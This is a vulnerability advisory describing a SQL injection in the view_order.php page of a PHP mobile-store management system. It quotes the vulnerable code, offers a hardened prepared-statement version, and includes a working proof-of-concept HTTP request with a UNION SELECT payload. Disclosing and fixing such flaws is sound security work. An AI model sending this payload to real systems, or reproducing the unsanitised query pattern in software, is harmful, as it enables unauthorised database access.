Sourcecodester / Mobile Management Store - SQL Injection in View Order

Vendor Homepage:

https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html

Affected Component

/admin/orders/view_order.php

Code

```php
<?php 
if(!isset($_GET['id'])){
    $_settings->set_flashdata('error','No order ID Provided.');
    redirect('admin/?page=orders');
}
// Injection point: $_GET['id'] is interpolated straight into the SQL string
// with no validation or parameter binding.
$order = $conn->query("SELECT o.*,concat(c.firstname,' ',c.lastname) as client FROM `orders` o inner join clients c on c.id = o.client_id where o.id = '{$_GET['id']}' ");
if($order->num_rows > 0){
    // Variable-variables: every returned column becomes a PHP variable.
    foreach($order->fetch_assoc() as $k => $v){
        $$k = $v;
    }
}else{
    $_settings->set_flashdata('error','Order ID provided is Unknown');
    redirect('admin/?page=orders');
}
?>
```
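A hardened version of the same lookup, added here as an example and not taken from the project: it validates the id as a positive integer and binds it through a mysqli prepared statement, so the query structure can no longer be altered by the request. It assumes `$conn` is a mysqli connection built with mysqlnd (needed for `get_result()`), and that `$_settings->set_flashdata()` and `redirect()` behave as in the original file.

```php
<?php
// Added example (not the project's code): hardened replacement for the
// view_order.php lookup. Assumes $conn is a mysqli connection (mysqlnd) and
// that $_settings->set_flashdata() and redirect() exist as in the original.

// Accept only a positive integer order id. filter_input() returns null when
// the parameter is absent and false when it fails validation.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === null || $id === false) {
    $_settings->set_flashdata('error', 'No valid order ID provided.');
    redirect('admin/?page=orders');
    exit;
}

// Parameterised query: the id is sent as a bound integer, never as SQL text,
// so a quote or keyword in the input cannot change the statement.
$stmt = $conn->prepare(
    "SELECT o.*, CONCAT(c.firstname, ' ', c.lastname) AS client
       FROM `orders` o
       INNER JOIN clients c ON c.id = o.client_id
      WHERE o.id = ?"
);
$stmt->bind_param('i', $id);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
$stmt->close();

if ($row === null) {
    $_settings->set_flashdata('error', 'Order ID provided is Unknown');
    redirect('admin/?page=orders');
    exit;
}

// Copy the columns into explicitly named variables rather than using
// variable-variables ($$k), which let a column name overwrite existing
// variables such as $conn or $_settings.
$order_id     = (int) $row['id'];
$order_client = $row['client'];
```

The same pattern (integer validation plus a bound parameter) applies to every other `$_GET`/`$_POST` value the application interpolates into SQL.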

Proof of Concept

HTTP Request Example

```http
GET /mobile_store/admin/?page=orders/view_order&id=1'+AND+FALSE+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version()--+- HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/mobile_store/admin/?page=orders
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: lang=en_US; 
Connection: close
```

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Credits

Russel James Avenido